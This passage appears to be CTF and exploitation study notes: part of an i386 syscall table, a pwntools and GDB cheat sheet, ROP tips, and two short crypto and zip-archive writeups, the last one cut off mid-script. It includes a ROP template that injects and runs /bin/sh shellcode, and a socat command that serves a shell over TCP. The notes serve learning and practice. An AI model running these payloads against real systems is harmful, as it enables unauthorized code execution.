109 olduname 0x6d struct oldold_utsname *name - - - - - kernel/sys.c:1330
110 iopl 0x6e unsigned int level - - - - - arch/x86/kernel/ioport.c:96
111 vhangup 0x6f - - - - - - fs/open.c:1156
112 idle - - - - - - - Not implemented
113 vm86old 0x71 struct vm86_struct *v86 - - - - - arch/x86/kernel/vm86_32.c:203
114 wait4 0x72 pid_t upid int *stat_addr int options struct rusage *ru - - kernel/exit.c:1834
115 swapoff 0x73 const char *specialfile - - - - - mm/swapfile.c:1539
116 sysinfo 0x74 struct sysinfo *info - - - - - kernel/timer.c:1641
117 ipc 0x75 unsigned int call int first unsigned long second unsigned long third void *ptr long fifth ipc/syscall.c:16
118 fsync 0x76 unsigned int fd - - - - - fs/sync.c:201
119 sigreturn 0x77 - - - - - - arch/x86/kernel/signal.c:543
120 clone 0x78 unsigned long clone_flags unsigned long newsp void *parent_tid void *child_tid - - arch/x86/kernel/process.c:293
121 setdomainname 0x79 char *name int len - - - - kernel/sys.c:1416
122 uname 0x7a struct old_utsname *name - - - - - kernel/sys.c:1311
123 modify_ldt 0x7b int func void *ptr unsigned long bytecount - - - arch/x86/kernel/ldt.c:247
124 adjtimex 0x7c struct timex *txc_p - - - - - kernel/time.c:200
125 mprotect 0x7d unsigned long start size_t len unsigned long prot - - - mm/mprotect.c:232
126 sigprocmask 0x7e int how old_sigset_t *nset old_sigset_t *oset - - - kernel/signal.c:3125
127 create_module - - - - - - - Not implemented
128 init_module 0x80 void *umod unsigned long len const char *uargs - - - kernel/module.c:3010
129 delete_module 0x81 const char *name_user unsigned int flags - - - - kernel/module.c:768
130 get_kernel_syms - - - - - - - Not implemented
131 quotactl 0x83 unsigned int cmd const char *special qid_t id void *addr - - fs/quota/quota.c:346
132 getpgid 0x84 pid_t pid - - - - - kernel/sys.c:1154
133 fchdir 0x85 unsigned int fd - - - - - fs/open.c:396
134 bdflush 0x86 int func long data - - - - fs/buffer.c:3130
135 sysfs 0x87 int option unsigned long arg1 unsigned long arg2 - - - fs/filesystems.c:183
136 personality 0x88 unsigned int personality - - - - - kernel/exec_domain.c:182
137 afs_syscall - - - - - - - Not implemented
138 setfsuid 0x8a uid_t uid - - - - - kernel/sys.c:969
139 setfsgid 0x8b gid_t gid - - - - - kernel/sys.c:1008
140 _llseek 0x8c unsigned int fd unsigned long offset_high unsigned long offset_low loff_t *result unsigned int origin - fs/read_write.c:254
141 getdents 0x8d unsigned int fd struct linux_dirent *dirent unsigned int count - - - fs/readdir.c:191
142 _newselect 0x8e int n fd_set *inp fd_set *outp fd_set *exp struct timeval *tvp - fs/select.c:593
143 flock 0x8f unsigned int fd unsigned int cmd - - - - fs/locks.c:1636
144 msync 0x90 unsigned long start size_t len int flags - - - mm/msync.c:31
145 readv 0x91 unsigned long fd const struct iovec *vec unsigned long vlen - - - fs/read_write.c:787
146 writev 0x92 unsigned long fd const struct iovec *vec unsigned long vlen - - - fs/read_write.c:808
147 getsid 0x93 pid_t pid - - - - - kernel/sys.c:1191
148 fdatasync 0x94 unsigned int fd - - - - - fs/sync.c:206
149 _sysctl 0x95 struct __sysctl_args *args - - - - - kernel/sysctl_binary.c:1444
150 mlock 0x96 unsigned long start size_t len - - - - mm/mlock.c:482
151 munlock 0x97 unsigned long start size_t len - - - - mm/mlock.c:512
152 mlockall 0x98 int flags - - - - - mm/mlock.c:549
153 munlockall 0x99 - - - - - - mm/mlock.c:582
154 sched_setparam 0x9a pid_t pid struct sched_param *param - - - - kernel/sched/core.c:4477
155 sched_getparam 0x9b pid_t pid struct sched_param *param - - - - kernel/sched/core.c:4512
156 sched_setscheduler 0x9c pid_t pid int policy struct sched_param *param - - - kernel/sched/core.c:4462
157 sched_getscheduler 0x9d pid_t pid - - - - - kernel/sched/core.c:4486
158 sched_yield 0x9e - - - - - - kernel/sched/core.c:4711
159 sched_get_priority_max 0x9f int policy - - - - - kernel/sched/core.c:4935
160 sched_get_priority_min 0xa0 int policy - - - - - kernel/sched/core.c:4960
161 sched_rr_get_interval 0xa1 pid_t pid struct timespec *interval - - - - kernel/sched/core.c:4985
162 nanosleep 0xa2 struct timespec *rqtp struct timespec *rmtp - - - - kernel/hrtimer.c:1621
163 mremap 0xa3 unsigned long addr unsigned long old_len unsigned long new_len unsigned long flags unsigned long new_addr - mm/mremap.c:431
164 setresuid 0xa4 uid_t ruid uid_t euid uid_t suid - - - kernel/sys.c:808
165 getresuid 0xa5 uid_t *ruidp uid_t *euidp uid_t *suidp - - - kernel/sys.c:873
166 vm86 0xa6 unsigned long cmd unsigned long arg - - - - arch/x86/kernel/vm86_32.c:232
167 query_module - - - - - - - Not implemented
168 poll 0xa8 struct pollfd *ufds unsigned int nfds int timeout_msecs - - - fs/select.c:908
169 nfsservctl - - - - - - - Not implemented
170 setresgid 0xaa gid_t rgid gid_t egid gid_t sgid - - - kernel/sys.c:893
171 getresgid 0xab gid_t *rgidp gid_t *egidp gid_t *sgidp - - - kernel/sys.c:945
172 prctl 0xac int option unsigned long arg2 unsigned long arg3 unsigned long arg4 unsigned long arg5 - kernel/sys.c:1999
173 rt_sigreturn 0xad - - - - - - arch/x86/kernel/signal.c:571
174 rt_sigaction 0xae int sig const struct sigaction *act struct sigaction *oact size_t sigsetsize - - kernel/signal.c:3174
175 rt_sigprocmask 0xaf int how sigset_t *nset sigset_t *oset size_t sigsetsize - - kernel/signal.c:2591
176 rt_sigpending 0xb0 sigset_t *set size_t sigsetsize - - - - kernel/signal.c:2651
177 rt_sigtimedwait 0xb1 const sigset_t *uthese siginfo_t *uinfo const struct timespec *uts size_t sigsetsize - - kernel/signal.c:2805
178 rt_sigqueueinfo 0xb2 pid_t pid int sig siginfo_t *uinfo - - - kernel/signal.c:2938
179 rt_sigsuspend 0xb3 sigset_t *unewset size_t sigsetsize - - - - kernel/signal.c:3274
180 pread64 0xb4 char *buf size_t count loff_t pos - - - - fs/read_write.c:495
181 pwrite64 0xb5 const char *buf size_t count loff_t pos - - - - fs/read_write.c:524
182 chown 0xb6 const char *filename uid_t user gid_t group - - - fs/open.c:540
183 getcwd 0xb7 char *buf unsigned long size - - - - fs/dcache.c:2885
184 capget 0xb8 cap_user_header_t header cap_user_data_t dataptr - - - - kernel/capability.c:158
185 capset 0xb9 cap_user_header_t header const cap_user_data_t data - - - - kernel/capability.c:232
186 sigaltstack 0xba const stack_t *uss stack_t *uoss - - - - arch/x86/kernel/signal.c:533
187 sendfile 0xbb int out_fd int in_fd off_t *offset size_t count - - fs/read_write.c:973
188 getpmsg - - - - - - - Not implemented
189 putpmsg - - - - - - - Not implemented
190 vfork 0xbe - - - - - - arch/x86/kernel/process.c:286
191 ugetrlimit 0xbf unsigned int resource struct rlimit *rlim - - - - kernel/sys.c:1440
192 mmap2 0xc0 unsigned long addr unsigned long len unsigned long prot unsigned long flags unsigned long fd unsigned long pgoff mm/mmap.c:1105
193 truncate64 0xc1 loff_t length - - - - - fs/open.c:188
194 ftruncate64 0xc2 loff_t length - - - - - fs/open.c:200
195 stat64 0xc3 const char *filename struct stat64 *statbuf - - - - fs/stat.c:372
196 lstat64 0xc4 const char *filename struct stat64 *statbuf - - - - fs/stat.c:384
197 fstat64 0xc5 unsigned long fd struct stat64 *statbuf - - - - fs/stat.c:396
198 lchown32 0xc6 const char *filename uid_t user gid_t group - - - fs/open.c:586
199 getuid32 0xc7 - - - - - - kernel/timer.c:1435
200 getgid32 0xc8 - - - - - - kernel/timer.c:1447
201 geteuid32 0xc9 - - - - - - kernel/timer.c:1441
202 getegid32 0xca - - - - - - kernel/timer.c:1453
203 setreuid32 0xcb uid_t ruid uid_t euid - - - - kernel/sys.c:690
204 setregid32 0xcc gid_t rgid gid_t egid - - - - kernel/sys.c:557
205 getgroups32 0xcd int gidsetsize gid_t *grouplist - - - - kernel/groups.c:202
206 setgroups32 0xce int gidsetsize gid_t *grouplist - - - - kernel/groups.c:231
207 fchown32 0xcf unsigned int fd uid_t user gid_t group - - - fs/open.c:605
208 setresuid32 0xd0 uid_t ruid uid_t euid uid_t suid - - - kernel/sys.c:808
209 getresuid32 0xd1 uid_t *ruidp uid_t *euidp uid_t *suidp - - - kernel/sys.c:873
210 setresgid32 0xd2 gid_t rgid gid_t egid gid_t sgid - - - kernel/sys.c:893
211 getresgid32 0xd3 gid_t *rgidp gid_t *egidp gid_t *sgidp - - - kernel/sys.c:945
212 chown32 0xd4 const char *filename uid_t user gid_t group - - - fs/open.c:540
213 setuid32 0xd5 uid_t uid - - - - - kernel/sys.c:761
214 setgid32 0xd6 gid_t gid - - - - - kernel/sys.c:614
215 setfsuid32 0xd7 uid_t uid - - - - - kernel/sys.c:969
216 setfsgid32 0xd8 gid_t gid - - - - - kernel/sys.c:1008
217 pivot_root 0xd9 const char *new_root const char *put_old - - - - fs/namespace.c:2453
218 mincore 0xda unsigned long start size_t len unsigned char *vec - - - mm/mincore.c:266
219 madvise 0xdb unsigned long start size_t len_in int behavior - - - mm/madvise.c:362
220 getdents64 0xdc unsigned int fd struct linux_dirent64 *dirent unsigned int count - - - fs/readdir.c:272
221 fcntl64 0xdd unsigned int fd unsigned int cmd unsigned long arg - - - fs/fcntl.c:468
224 gettid 0xe0 - - - - - - kernel/timer.c:1569
225 readahead 0xe1 loff_t offset size_t count - - - - - mm/readahead.c:579
226 setxattr 0xe2 const char *pathname const char *name const void *value size_t size int flags - fs/xattr.c:361
227 lsetxattr 0xe3 const char *pathname const char *name const void *value size_t size int flags - fs/xattr.c:380
228 fsetxattr 0xe4 int fd const char *name const void *value size_t size int flags - fs/xattr.c:399
229 getxattr 0xe5 const char *pathname const char *name void *value size_t size - - fs/xattr.c:459
230 lgetxattr 0xe6 const char *pathname const char *name void *value size_t size - - fs/xattr.c:473
231 fgetxattr 0xe7 int fd const char *name void *value size_t size - - fs/xattr.c:487
232 listxattr 0xe8 const char *pathname char *list size_t size - - - fs/xattr.c:541
233 llistxattr 0xe9 const char *pathname char *list size_t size - - - fs/xattr.c:555
234 flistxattr 0xea int fd char *list size_t size - - - fs/xattr.c:569
235 removexattr 0xeb const char *pathname const char *name - - - - fs/xattr.c:602
236 lremovexattr 0xec const char *pathname const char *name - - - - fs/xattr.c:620
237 fremovexattr 0xed int fd const char *name - - - - fs/xattr.c:638
238 tkill 0xee pid_t pid int sig - - - - kernel/signal.c:2923
239 sendfile64 0xef int out_fd int in_fd loff_t *offset size_t count - - fs/read_write.c:992
240 futex 0xf0 u32 *uaddr int op u32 val struct timespec *utime u32 *uaddr2 u32 val3 kernel/futex.c:2680
241 sched_setaffinity 0xf1 pid_t pid unsigned int len unsigned long *user_mask_ptr - - - kernel/sched/core.c:4626
242 sched_getaffinity 0xf2 pid_t pid unsigned int len unsigned long *user_mask_ptr - - - kernel/sched/core.c:4677
243 set_thread_area 0xf3 struct user_desc *u_info - - - - - arch/x86/kernel/tls.c:92
244 get_thread_area 0xf4 struct user_desc *u_info - - - - - arch/x86/kernel/tls.c:142
245 io_setup 0xf5 unsigned nr_events aio_context_t *ctxp - - - - fs/aio.c:1298
246 io_destroy 0xf6 aio_context_t ctx - - - - - fs/aio.c:1334
247 io_getevents 0xf7 aio_context_t ctx_id long min_nr long nr struct io_event *events struct timespec *timeout - fs/aio.c:1844
248 io_submit 0xf8 aio_context_t ctx_id long nr struct iocb * *iocbpp - - - fs/aio.c:1746
249 io_cancel 0xf9 aio_context_t ctx_id struct iocb *iocb struct io_event *result - - - fs/aio.c:1781
250 fadvise64 0xfa loff_t offset size_t len int advice - - - - mm/fadvise.c:148
252 exit_group 0xfc int error_code - - - - - kernel/exit.c:1136
253 lookup_dcookie 0xfd char *buf size_t len - - - - - fs/dcookies.c:148
254 epoll_create 0xfe int size - - - - - fs/eventpoll.c:1668
255 epoll_ctl 0xff int epfd int op int fd struct epoll_event *event - - fs/eventpoll.c:1681
256 epoll_wait 0x100 int epfd struct epoll_event *events int maxevents int timeout - - fs/eventpoll.c:1809
257 remap_file_pages 0x101 unsigned long start unsigned long size unsigned long prot unsigned long pgoff unsigned long flags - mm/fremap.c:122
258 set_tid_address 0x102 int *tidptr - - - - - kernel/fork.c:1109
259 timer_create 0x103 const clockid_t which_clock struct sigevent *timer_event_spec timer_t *created_timer_id - - - kernel/posix-timers.c:535
260 timer_settime 0x104 timer_t timer_id int flags const struct itimerspec *new_setting struct itimerspec *old_setting - - kernel/posix-timers.c:819
261 timer_gettime 0x105 timer_t timer_id struct itimerspec *setting - - - - kernel/posix-timers.c:715
262 timer_getoverrun 0x106 timer_t timer_id - - - - - kernel/posix-timers.c:751
263 timer_delete 0x107 timer_t timer_id - - - - - kernel/posix-timers.c:882
264 clock_settime 0x108 const clockid_t which_clock const struct timespec *tp - - - - kernel/posix-timers.c:950
265 clock_gettime 0x109 const clockid_t which_clock struct timespec *tp - - - - kernel/posix-timers.c:965
266 clock_getres 0x10a const clockid_t which_clock struct timespec *tp - - - - kernel/posix-timers.c:1006
267 clock_nanosleep 0x10b const clockid_t which_clock int flags const struct timespec *rqtp struct timespec *rmtp - - kernel/posix-timers.c:1035
268 statfs64 0x10c const char *pathname size_t sz struct statfs64 *buf - - - fs/statfs.c:175
269 fstatfs64 0x10d unsigned int fd size_t sz struct statfs64 *buf - - - fs/statfs.c:196
270 tgkill 0x10e pid_t tgid pid_t pid int sig - - - kernel/signal.c:2907
271 utimes 0x10f char *filename struct timeval *utimes - - - - fs/utimes.c:221
272 fadvise64_64 0x110 loff_t offset loff_t len int advice - - - - mm/fadvise.c:27
273 vserver - - - - - - - Not implemented
274 mbind 0x112 unsigned long start unsigned long len unsigned long mode unsigned long *nmask unsigned long maxnode unsigned flags mm/mempolicy.c:1263
275 get_mempolicy 0x113 int *policy unsigned long *nmask unsigned long maxnode unsigned long addr unsigned long flags - mm/mempolicy.c:1400
276 set_mempolicy 0x114 int mode unsigned long *nmask unsigned long maxnode - - - mm/mempolicy.c:1285
277 mq_open 0x115 const char *u_name int oflag umode_t mode struct mq_attr *u_attr - - ipc/mqueue.c:803
278 mq_unlink 0x116 const char *u_name - - - - - ipc/mqueue.c:876
279 mq_timedsend 0x117 mqd_t mqdes const char *u_msg_ptr size_t msg_len unsigned int msg_prio const struct timespec *u_abs_timeout - ipc/mqueue.c:971
280 mq_timedreceive 0x118 mqd_t mqdes char *u_msg_ptr size_t msg_len unsigned int *u_msg_prio const struct timespec *u_abs_timeout - ipc/mqueue.c:1092
281 mq_notify 0x119 mqd_t mqdes const struct sigevent *u_notification - - - - ipc/mqueue.c:1201
282 mq_getsetattr 0x11a mqd_t mqdes const struct mq_attr *u_mqstat struct mq_attr *u_omqstat - - - ipc/mqueue.c:1333
283 kexec_load 0x11b unsigned long entry unsigned long nr_segments struct kexec_segment *segments unsigned long flags - - kernel/kexec.c:940
284 waitid 0x11c int which pid_t upid struct siginfo *infop int options struct rusage *ru - kernel/exit.c:1763
286 add_key 0x11e const char *_type const char *_description const void *_payload size_t plen key_serial_t ringid - security/keys/keyctl.c:54
287 request_key 0x11f const char *_type const char *_description const char *_callout_info key_serial_t destringid - - security/keys/keyctl.c:147
288 keyctl 0x120 int option unsigned long arg2 unsigned long arg3 unsigned long arg4 unsigned long arg5 - security/keys/keyctl.c:1556
289 ioprio_set 0x121 int which int who int ioprio - - - fs/ioprio.c:61
290 ioprio_get 0x122 int which int who - - - - fs/ioprio.c:176
291 inotify_init 0x123 - - - - - - fs/notify/inotify/inotify_user.c:749
292 inotify_add_watch 0x124 int fd const char *pathname u32 mask - - - fs/notify/inotify/inotify_user.c:754
293 inotify_rm_watch 0x125 int fd __s32 wd - - - - fs/notify/inotify/inotify_user.c:795
294 migrate_pages 0x126 pid_t pid unsigned long maxnode const unsigned long *old_nodes const unsigned long *new_nodes - - mm/mempolicy.c:1304
295 openat 0x127 int dfd const char *filename int flags umode_t mode - - fs/open.c:1059
296 mkdirat 0x128 int dfd const char *pathname umode_t mode - - - fs/namei.c:2723
297 mknodat 0x129 int dfd const char *filename umode_t mode unsigned dev - - fs/namei.c:2646
298 fchownat 0x12a int dfd const char *filename uid_t user gid_t group int flag - fs/open.c:559
299 futimesat 0x12b int dfd const char *filename struct timeval *utimes - - - fs/utimes.c:193
300 fstatat64 0x12c int dfd const char *filename struct stat64 *statbuf int flag - - fs/stat.c:407
301 unlinkat 0x12d int dfd const char *pathname int flag - - - fs/namei.c:2968
302 renameat 0x12e int olddfd const char *oldname int newdfd const char *newname - - fs/namei.c:3309
303 linkat 0x12f int olddfd const char *oldname int newdfd const char *newname int flags - fs/namei.c:3097
304 symlinkat 0x130 const char *oldname int newdfd const char *newname - - - fs/namei.c:3004
305 readlinkat 0x131 int dfd const char *pathname char *buf int bufsiz - - fs/stat.c:293
306 fchmodat 0x132 int dfd const char *filename umode_t mode - - - fs/open.c:486
307 faccessat 0x133 int dfd const char *filename int mode - - - fs/open.c:299
308 pselect6 0x134 int n fd_set *inp fd_set *outp fd_set *exp struct timespec *tsp void *sig fs/select.c:671
309 ppoll 0x135 struct pollfd *ufds unsigned int nfds struct timespec *tsp const sigset_t *sigmask size_t sigsetsize - fs/select.c:942
310 unshare 0x136 unsigned long unshare_flags - - - - - kernel/fork.c:1778
311 set_robust_list 0x137 struct robust_list_head *head size_t len - - - - kernel/futex.c:2422
312 get_robust_list 0x138 int pid struct robust_list_head * *head_ptr size_t *len_ptr - - - kernel/futex.c:2444
313 splice 0x139 int fd_in loff_t *off_in int fd_out loff_t *off_out size_t len unsigned int flags fs/splice.c:1689
314 sync_file_range 0x13a loff_t offset loff_t nbytes unsigned int flags - - - - fs/sync.c:275
315 tee 0x13b int fdin int fdout size_t len unsigned int flags - - fs/splice.c:2025
316 vmsplice 0x13c int fd const struct iovec *iov unsigned long nr_segs unsigned int flags - - fs/splice.c:1663
317 move_pages 0x13d pid_t pid unsigned long nr_pages const void * *pages const int *nodes int *status int flags mm/migrate.c:1343
318 getcpu 0x13e unsigned *cpup unsigned *nodep struct getcpu_cache *unused - - - kernel/sys.c:2179
319 epoll_pwait 0x13f int epfd struct epoll_event *events int maxevents int timeout const sigset_t *sigmask size_t sigsetsize fs/eventpoll.c:1860
320 utimensat 0x140 int dfd const char *filename struct timespec *utimes int flags - - fs/utimes.c:175
321 signalfd 0x141 int ufd sigset_t *user_mask size_t sizemask - - - fs/signalfd.c:292
322 timerfd_create 0x142 int clockid int flags - - - - fs/timerfd.c:252
323 eventfd 0x143 unsigned int count - - - - - fs/eventfd.c:431
324 fallocate 0x144 int mode loff_t offset loff_t len - - - - fs/open.c:272
325 timerfd_settime 0x145 int ufd int flags const struct itimerspec *utmr struct itimerspec *otmr - - fs/timerfd.c:283
326 timerfd_gettime 0x146 int ufd struct itimerspec *otmr - - - - fs/timerfd.c:344
327 signalfd4 0x147 int ufd sigset_t *user_mask size_t sizemask int flags - - fs/signalfd.c:237
328 eventfd2 0x148 unsigned int count int flags - - - - fs/eventfd.c:406
329 epoll_create1 0x149 int flags - - - - - fs/eventpoll.c:1625
330 dup3 0x14a unsigned int oldfd unsigned int newfd int flags - - - fs/fcntl.c:53
331 pipe2 0x14b int *fildes int flags - - - - fs/pipe.c:1133
332 inotify_init1 0x14c int flags - - - - - fs/notify/inotify/inotify_user.c:724
333 preadv 0x14d unsigned long fd const struct iovec *vec unsigned long vlen unsigned long pos_l unsigned long pos_h - fs/read_write.c:835
334 pwritev 0x14e unsigned long fd const struct iovec *vec unsigned long vlen unsigned long pos_l unsigned long pos_h - fs/read_write.c:860
335 rt_tgsigqueueinfo 0x14f pid_t tgid pid_t pid int sig siginfo_t *uinfo - - kernel/signal.c:2979
336 perf_event_open 0x150 struct perf_event_attr *attr_uptr pid_t pid int cpu int group_fd unsigned long flags - kernel/events/core.c:6186
337 recvmmsg 0x151 int fd struct mmsghdr *mmsg unsigned int vlen unsigned int flags struct timespec *timeout - net/socket.c:2313
338 fanotify_init 0x152 unsigned int flags unsigned int event_f_flags - - - - fs/notify/fanotify/fanotify_user.c:679
339 fanotify_mark 0x153 unsigned int flags __u64 mask int dfd const char *pathname - - - - fs/notify/fanotify/fanotify_user.c:767
340 prlimit64 0x154 pid_t pid unsigned int resource const struct rlimit64 *new_rlim struct rlimit64 *old_rlim - - kernel/sys.c:1599
341 name_to_handle_at 0x155 int dfd const char *name struct file_handle *handle int *mnt_id int flag - fs/fhandle.c:92
342 open_by_handle_at 0x156 int mountdirfd struct file_handle *handle int flags - - - fs/fhandle.c:257
343 clock_adjtime 0x157 const clockid_t which_clock struct timex *utx - - - - kernel/posix-timers.c:983
344 syncfs 0x158 int fd - - - - - fs/sync.c:134
345 sendmmsg 0x159 int fd struct mmsghdr *mmsg unsigned int vlen unsigned int flags - - net/socket.c:2091
346 setns 0x15a int fd int nstype - - - - kernel/nsproxy.c:235
347 process_vm_readv 0x15b pid_t pid const struct iovec *lvec unsigned long liovcnt const struct iovec *rvec unsigned long riovcnt unsigned long flags mm/process_vm_access.c:398
348 process_vm_writev 0x15c pid_t pid const struct iovec *lvec unsigned long liovcnt const struct iovec *rvec unsigned long riovcnt unsigned long flags mm/process_vm_access.c:405
349 kcmp 0x15d pid_t pid1 pid_t pid2 int type unsigned long idx1 unsigned long idx2 - kernel/kcmp.c:95

pwntools

process & remote

p = process(binary.path)

r = remote('google.com', 80)

context

exe = context.binary = ELF('./challenge-binary') # convenient together with asm(), e.g. when building shellcode

context.log_level = 'debug' # show every byte sent and received, as hex

send, sendline, recv, recvuntil, recvrepeat, recvline

p.send()

p.sendline('111') # send data with a trailing \n

p.recv(numb=4096, timeout=default)

p.recvrepeat(timeout=default) # receive until EOF or timeout

p.recvuntil('abc') # receive until 'abc' has been received

p.recvline() # receive up to and including the newline

ELF

Handy for inspecting ELF information such as the GOT and PLT

>>> e = ELF('/bin/cat')
>>> print(hex(e.address))
0x400000
>>> print(hex(e.symbols['write']))
0x401680
>>> print(hex(e.got['write']))
0x60b070
>>> print(hex(e.plt['write']))
0x401680

cyclic

cyclic n    # generate n characters; by default (32-bit word size, change with -c) any four consecutive characters are unique

cyclic -l 0x61616166 # look up the offset of this value within the pattern

attach

# Attach directly to pid 1234
gdb.attach(1234)


# Attach to the youngest "bash" process
gdb.attach('bash')


# Start a process
bash = process('bash')

# Attach the debugger
gdb.attach(bash, '''
set follow-fork-mode child
break execve
continue
''')

# Interact with the process
bash.sendline('whoami')


# Start a forking server
server = process(['socat', 'tcp-listen:1234,fork,reuseaddr', 'exec:/bin/sh'])

# Connect to the server
io = remote('localhost', 1234)

# Connect the debugger to the server-spawned process
gdb.attach(io, '''
break exit
continue
''')

# Talk to the spawned 'sh'
io.sendline('exit')


# Connect to the SSH server
shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)

# Start a process on the server
cat = shell.process(['cat'])

# Attach a debugger to it
gdb.attach(cat, '''
break exit
continue
''')

# Cause `cat` to exit
cat.close()

pwn template

Generates a template for the exploit script

Reference link

GDB

General

x

x/20wx 0x4005fe

Examine memory at an address: 20 is the count (may be omitted); w means 4-byte words and can be replaced by b/h/g (1/2/8 bytes); the second x means hexadecimal and can be replaced by u/d/s/i (unsigned int / decimal / string / instruction); what follows the space is the address.

set

set *address = value # store value at address, 4 bytes at a time

* can be replaced by {char/short/long} to store 1/2/8 bytes; registers can be assigned the same way

e.g.

set {int}0x0804a060 = 1337

peda

  • elfsymbol
    • shows the function entries of the .plt
    • needed for ROP
  • vmmap
    • shows the process mappings
    • virtual memory permissions: r=read, w=write, x=execute, s=shared, p=private
  • readelf
    • shows section locations
    • needed for ret2dl_resolve
  • find
    • search memory for a pattern
      • usually used to locate strings, e.g. find /bin/sh
  • record

ROP

rp++

ROPgadget

--ropchain only works for statically linked binaries

pwntools ROP module

Code snippet

from pwn import *
import time

proc = './binary'
exe = context.binary = ELF(proc)
bss_addr = exe.bss()  # the page left this value blank; ELF.bss() returns the start of .bss, used here as scratch space
shellcode = asm(shellcraft.sh())

p = process(proc)

p.recvuntil(b'')  # put the prompt the binary prints before reading input here

rop = ROP(exe)
rop.read(0, bss_addr + 0x100, len(shellcode))  # read(stdin, bss + 0x100, len(shellcode))
rop.call(bss_addr + 0x100)                     # then jump to what was just read

p.send(b'a' * 20 + rop.chain())  # filler (offset as in the original) followed by the chain; the original had the typo p.sed
time.sleep(1)
p.send(shellcode)

p.interactive()

tips

  • File descriptors used by read and write: standard input is 0, standard output is 1, standard error is 2

Finding the libc version

Remote

  • libcdb.com

  • libc-database (a project on GitHub; less complete than the site above)

Local

  • ldd binary shows which libc library file the binary uses

objdump

objdump -R binary

Shows the binary's dynamic relocation entries, i.e. the imported symbols and their GOT slots

Segment

A concept that only exists while the program runs: memory is split into several segments according to read/write/execute permissions and purpose, e.g. rodata, data, code, stack, heap

  • data: rw-
  • code: r-x
  • stack: rw-
  • heap: rw-

x86 assembly

lea & mov

e.g.

lea/mov eax,[esp + 4]

eax = 3
esp + 4 = 0xbfff7488
[esp + 4] = 0xdeadbeef

lea: eax = 0xbfff7488
mov: eax = 0xdeadbeef

lea loads the effective address itself; mov loads the value stored at that address.

leave

mov esp,ebp
pop ebp

syscalls

int 0x80 is the interrupt entry that services system_call

  • The basic steps by which the operating system implements a system call are
    1. The application calls a library function (API)
    2. The API stores the system call number in EAX, then traps into kernel mode through the interrupt
    3. The kernel's interrupt handler dispatches to the corresponding kernel function (the system call) by that number
    4. The system call does its work, stores the return value in EAX and returns to the interrupt handler
    5. The interrupt handler returns to the API
    6. The API returns EAX to the application
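Steps 1 and 2 seen from user space, as an added Python example (not from the page): libc's syscall(2) wrapper takes the number that the API would otherwise place in EAX/RAX, so calling it through ctypes shows that the number, not the name, selects the kernel function, and that a number beyond the end of the table is refused just like the "Not implemented" rows of the i386 table this page reproduces. The getpid numbers are taken from the respective ABI tables (20 is the i386 value; 39 and 172 are x86_64 and aarch64) and are the only assumption; both functions return None when not running on Linux or on an unlisted architecture.

```python
import ctypes
import errno
import os
import platform
import sys

# getpid() numbers per Linux ABI. The same kernel function has a different
# number in every table, which is why exploit and sandbox code must be ABI-aware.
GETPID_NR = {"x86_64": 39, "i386": 20, "i686": 20, "aarch64": 172}


def _libc():
    libc = ctypes.CDLL(None, use_errno=True)  # the running process' libc
    libc.syscall.restype = ctypes.c_long
    return libc


def raw_getpid():
    """getpid via the generic syscall(2) wrapper: the wrapper loads the number
    into the syscall register and traps, which is steps 1 and 2 of the list."""
    if not sys.platform.startswith("linux"):
        return None
    nr = GETPID_NR.get(platform.machine())
    if nr is None:
        return None
    return int(_libc().syscall(ctypes.c_long(nr)))


def raw_getpid_matches():
    """True when the raw call and os.getpid() agree; None if unsupported here."""
    pid = raw_getpid()
    if pid is None:
        return None
    return pid == os.getpid()


def probe_unimplemented_number():
    """Call a number far past the end of the table. The kernel answers -1 with
    ENOSYS; a seccomp sandbox (e.g. a container runtime's default profile) may
    answer EPERM instead, which is itself worth knowing when reading traces."""
    if not sys.platform.startswith("linux"):
        return None
    libc = _libc()
    ctypes.set_errno(0)
    ret = int(libc.syscall(ctypes.c_long(0x7FFFFFFF)))
    return {"ret": ret, "errno": errno.errorcode.get(ctypes.get_errno(), "?")}
```

Run under strace the first call appears as a plain getpid() line even though no libc getpid() was invoked, because strace, like the kernel, only sees the number.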

common_encrypt

The encryption algorithm is

def encrypt(data, groupnums):
    a = []
    b = []
    section = int(len(data) / groupnums)
    for i in range(0, len(data), section):
        a.append(data[i:i + section])
    for i in range(section):
        for j in range(groupnums):
            b.append(a[j][i])
    cipher = ''.join(chr(ord(b[i]) ^ i) for i in range(len(b)))
    return cipher

Setting groupnums to 1 and encrypting once more (the transposition is then the identity, and XORing with the index a second time cancels it) gives the string
f_l1angt{3crr3ysptt10n_g1!s}
The braces suggest a rail fence cipher; by eye, k is 2.
Type the flag in by hand and submit.
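The last two steps carried out in code rather than by eye, as an added Python example (not part of the writeup): encrypt is rebuilt so its two layers, the column-wise transposition and the XOR with the position index, can be inverted separately. The "rail fence with k = 2" the author spotted is the grouped-column variant (split into groups of 2, read the first character of every group, then the second), which is exactly the inverse of encrypt's transposition for groupnums = 2, so decrypt() below works for any groupnums that divides the length, not only the k = 2 case on the page. STAGE2 is the intermediate string quoted above.

```python
def encrypt(data: str, groupnums: int) -> str:
    """The writeup's cipher: cut data into `groupnums` rows of equal length,
    read them column by column, then XOR every character with its position.
    Like the original it silently drops a tail that does not fill a row."""
    section = len(data) // groupnums
    rows = [data[i:i + section] for i in range(0, len(data), section)]
    transposed = [rows[j][i] for i in range(section) for j in range(groupnums)]
    return "".join(chr(ord(c) ^ i) for i, c in enumerate(transposed))


def xor_index(text: str) -> str:
    """XOR each character with its index. Applying it twice returns the input,
    which is why encrypt(cipher, 1) strips this layer: groupnums=1 turns the
    transposition into the identity and leaves only the XOR."""
    return "".join(chr(ord(c) ^ i) for i, c in enumerate(text))


def untranspose(text: str, groupnums: int) -> str:
    """Inverse of the column-wise read: character idx came from row idx % groupnums.
    This is the 'rail fence with k = groupnums' step done by eye in the writeup."""
    if len(text) % groupnums:
        raise ValueError("length must be a multiple of groupnums")
    rows = [""] * groupnums
    for idx, ch in enumerate(text):
        rows[idx % groupnums] += ch
    return "".join(rows)


def decrypt(cipher: str, groupnums: int) -> str:
    """Undo encrypt(): remove the XOR layer first, then the transposition."""
    return untranspose(xor_index(cipher), groupnums)


# Intermediate string from the writeup, XOR layer already removed.
STAGE2 = "f_l1angt{3crr3ysptt10n_g1!s}"
```

decrypt(encrypt(x, g), g) == x holds for every g that divides len(x); for the page's string, untranspose(STAGE2, 2) yields the flag directly.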

onion_secret

Rename the .jpg to .zip.
The hint shows that the extraction password is the hint's string with its question mark replaced by a number from 0 to 10.
Each extracted layer contains another one, so write a script.

import zipfile


j = 0
while True:
    original_file = str(j) + "onion.zip"
    original_file = zipfile.ZipFile(original_file, 'r')
